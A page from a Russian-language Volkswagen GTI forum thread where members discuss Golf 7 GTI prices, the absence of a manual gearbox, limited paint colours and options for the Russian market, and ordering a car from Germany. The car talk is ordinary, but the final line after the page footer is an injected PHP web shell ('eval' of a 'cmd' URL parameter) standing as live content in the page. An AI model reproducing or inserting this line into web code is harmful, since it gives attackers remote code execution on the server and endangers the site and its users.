+ Ответить в теме
Страница 3 из 14 ПерваяПервая 1 2 3 4 5 13 ... ПоследняяПоследняя
Показано с 21 по 30 из 137

Тема: Объявлены цены на 7ой GTI... не будет МКПП?


  1. #21
    GTI-Racing energia will become famous soon enough energia will become famous soon enough Аватар для energia
    Регистрация
    20.08.2010
    Откуда
    Москва
    Машина
    MK6R
    Сообщений
    721
    объясняю почему их нет и что дело вобщем-то скорее в нас. Я не могу что-то там считать на в этой теме - тут личное дело каждого + выбор всегда хорошо.
    Но у тебя же белый гольф, да? Зачем жалуешься на скучность цветов? Красный же был, синий был, интересный юнайтед грей...
    ну я покупал что было ибо б.у машина)
    Не покупайте только черные и белые - будут возить интересные цвета. Покупайте универсалы, а не седаны - будут возить универсалы. Покупайте дизель...ну вы поняли...
    Все логично с продажами в этой стране до предела.
    Например я в Германии только универсалы новые а6 видел, а у нас только седаны.
    У нас вон стали покупать коричневые машины - их дофига на складе. а вот сцирокко салатовый продавали в начале и перестали. Почему? Они только черные и белые покупаются.
    а как я куплю другой цвет если его нет? ты мне объясни пожалуйста, какая разница заводу в какой цвет покрасить авто для РФ? и с опциями вопрос открытый остался, зачем мне ППД если он мне ну нужен? но я не могу отказаться ))
    Например я в Германии только универсалы новые а6 видел, а у нас только седаны.
    и в Германии нельзя заказать седан? можно ) в Германии джипов мало, универсалов много, + 70% на дизеле, но они все могут заказать, заводу какая разница для какой страны делать не пойму. я был в Германии, там рассказали, что на заводе можно заказать любой оттенок любого цвета для гольфа))
    Последний раз редактировалось energia; 23.07.2013 в 12:04.

  2. #22
    Модератор GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold Аватар для GreyRabbit
    Регистрация
    26.07.2012
    Откуда
    Москва
    Машина
    GTI edition 35
    Сообщений
    1,233
    Ну разница в том, что там видимо один цех красит в интересные цвета и он далековато от того, что делает авто на рф. Я в этом не очень понимаю....тут надо знающих спросить. У них же поток. Им гемор везти одну машинку, выделяя ее из общего потока. Рынок Украины намного меньше и каждая опция вызывает меньше потерь. Чем более одинаковые машины заказываем - тем им легче. Особенно это касается цвета.
    Если нам и дадут супер-цвет-дя-избранных, то он будет стоить НЕМЕРЕНЫХ бабок. Так например на Джетту можно заказать кожаный салон за 120. Те опция салона кожа есть, но ее как бы и нет для адекватных людей. )

    ППД тебе не нужен, но большинству нужен. Многие выбирают самые высокие машины.

    Ну и у нас можно и седан и универсал а6. С ауди полное равноправие. Но у них покупают универсал, а у нас - седан. Наглядный пример что покупают и почему не возят из более бюджетных этот кузов. То же самое с дизелями.

  3. #23
    GTI-Racing dimitryst will become famous soon enough Аватар для dimitryst
    Регистрация
    13.09.2011
    Откуда
    МСК
    Машина
    Разноцветное такси
    Сообщений
    1,052
    Кто мешает заказать машину самому в Германии? Тут 2часа лету...

  4. #24
    GTI-Racing energia will become famous soon enough energia will become famous soon enough Аватар для energia
    Регистрация
    20.08.2010
    Откуда
    Москва
    Машина
    MK6R
    Сообщений
    721
    Ну разница в том, что там видимо один цех красит в интересные цвета и он далековато от того, что делает авто на рф. Я в этом не очень понимаю....тут надо знающих спросить. У них же поток. Им гемор везти одну машинку, выделяя ее из общего потока. Рынок Украины намного меньше и каждая опция вызывает меньше потерь. Чем более одинаковые машины заказываем - тем им легче. Особенно это касается цвета.
    Если нам и дадут супер-цвет-дя-избранных, то он будет стоить НЕМЕРЕНЫХ бабок. Так например на Джетту можно заказать кожаный салон за 120. Те опция салона кожа есть, но ее как бы и нет для адекватных людей. )

    ППД тебе не нужен, но большинству нужен. Многие выбирают самые высокие машины.

    Ну и у нас можно и седан и универсал а6. С ауди полное равноправие. Но у них покупают универсал, а у нас - седан. Наглядный пример что покупают и почему не возят из более бюджетных этот кузов. То же самое с дизелями.
    да все верно про поток, не выгодно вести вот и вся суть. но перфоманс пак и МКПП могли бы оставить.

    Добавлено через 1 минуту
    Кто мешает заказать машину самому в Германии? Тут 2часа лету...
    дороже будет потому что.
    Последний раз редактировалось energia; 23.07.2013 в 12:15. Причина: Добавлено сообщение

  5. #25
    GTI-Racing dvp is on a distinguished road Аватар для dvp
    Регистрация
    20.05.2013
    Откуда
    Самара
    Машина
    Овосч
    Сообщений
    33
    Цитата Сообщение от energia Посмотреть сообщение
    а как я куплю другой цвет если его нет?
    читаем официальный сайт и просвящаемся http://news.volkswagen.ru/288528/

    доступные цвета: в стандартной комплектации новый Golf GTI будет доступен в 3 цветах кузова: красный «Tornado», чёрный «Black» или белый «Pure White». Опционально покупатели смогут выбрать среди 7 дополнительных цветовых решений: к заказу доступны 2 варианта окраски с эффектом «перламутр» (чёрный «Deep» и эксклюзивный белый «Oryx») и 5 цветов с эффектом «металлик», в том числе специальный цвет «Carbon Steel», предлагаемый только для версии GTI.

  6. #26
    Модератор GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold Аватар для GreyRabbit
    Регистрация
    26.07.2012
    Откуда
    Москва
    Машина
    GTI edition 35
    Сообщений
    1,233
    ну если коротко, то да - не выгодно.

    Тут еще дело вот в чем. Вот представь себе офигенный дизельный гольф универсал на полном приводе. Но он же будет стоить офигеть сколько. Все подумают нах платить столько если можно купит бэху семерку бу. Все хотят выше класс.
    в Европе же покупают именно то, что нужно обычно. Вот недавно под мостом обсуждали пожилую пару на гольф Р в Европе. Они же покупают просто топовый гольф - им больше и не нужно, а не пулялку для Киевона.

  7. #27
    GTI-Racing energia will become famous soon enough energia will become famous soon enough Аватар для energia
    Регистрация
    20.08.2010
    Откуда
    Москва
    Машина
    MK6R
    Сообщений
    721
    читаем официальный сайт и просвящаемся http://news.volkswagen.ru/288528/
    не просветился, открой конфигуратор на .de и посмотри цвета для гти :)
    вот что понравилось: Спортивная подвеска с клиренсом, уменьшенным на 15 мм, подчеркивает сходство автомобиля с настоящим гоночным болидом.

  8. #28
    Кобрабля 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold Аватар для 2esco
    Регистрация
    27.12.2010
    Откуда
    Moscow
    Машина
    Candy
    Сообщений
    2,288
    Цитата Сообщение от GreyRabbit Посмотреть сообщение
    Вот недавно под мостом обсуждали пожилую пару на гольф Р в Европе. Они же покупают просто топовый гольф - им больше и не нужно, а не пулялку для Киевона.
    ерунда))) продавец попался просто четкий)
    по тебе так там и продавцы не нужны... как в супермаркет все могут заходить и брать все что им нужно)
    Провокатор^^

  9. #29
    GTI-Racing energia will become famous soon enough energia will become famous soon enough Аватар для energia
    Регистрация
    20.08.2010
    Откуда
    Москва
    Машина
    MK6R
    Сообщений
    721
    ну если коротко, то да - не выгодно.

    Тут еще дело вот в чем. Вот представь себе офигенный дизельный гольф универсал на полном приводе. Но он же будет стоить офигеть сколько. Все подумают нах платить столько если можно купит бэху семерку бу. Все хотят выше класс.
    в Европе же покупают именно то, что нужно обычно. Вот недавно под мостом обсуждали пожилую пару на гольф Р в Европе. Они же покупают просто топовый гольф - им больше и не нужно, а не пулялку для Киевона.
    ну да верно про то что купят бмв б.у - понт епта) , в Европе вообще видел много пенсионеров на порше, и на ретро карах)

  10. #30
    Модератор GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold Аватар для GreyRabbit
    Регистрация
    26.07.2012
    Откуда
    Москва
    Машина
    GTI edition 35
    Сообщений
    1,233
    ну, в супермаркетах тоже раньше у кажого прилавка по продавцу было.
    Он же мог продать пассат аллтрек например...или тот же 36.

+ Ответить в теме
Страница 3 из 14 ПерваяПервая 1 2 3 4 5 13 ... ПоследняяПоследняя

Похожие темы

  1. Реальные цены RNS 510 B, C, F, H , от Молдовы
    от alexandr22 в разделе Барахолка
    Ответов: 14
    Последнее сообщение: 02.04.2024, 04:11
  2. Бензин цены
    от Gomkv в разделе Украина
    Ответов: 80
    Последнее сообщение: 27.03.2011, 14:41
  3. А Цены Растут....
    от Mr.Nice в разделе Курилка
    Ответов: 0
    Последнее сообщение: 21.07.2008, 16:49
  4. Обсуждение цены Golf IV R32
    от BON в разделе Курилка
    Ответов: 32
    Последнее сообщение: 23.01.2008, 18:32
  5. цены на Американском рынке *(NEW)
    от Antonio в разделе Курилка
    Ответов: 7
    Последнее сообщение: 06.05.2007, 13:44

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}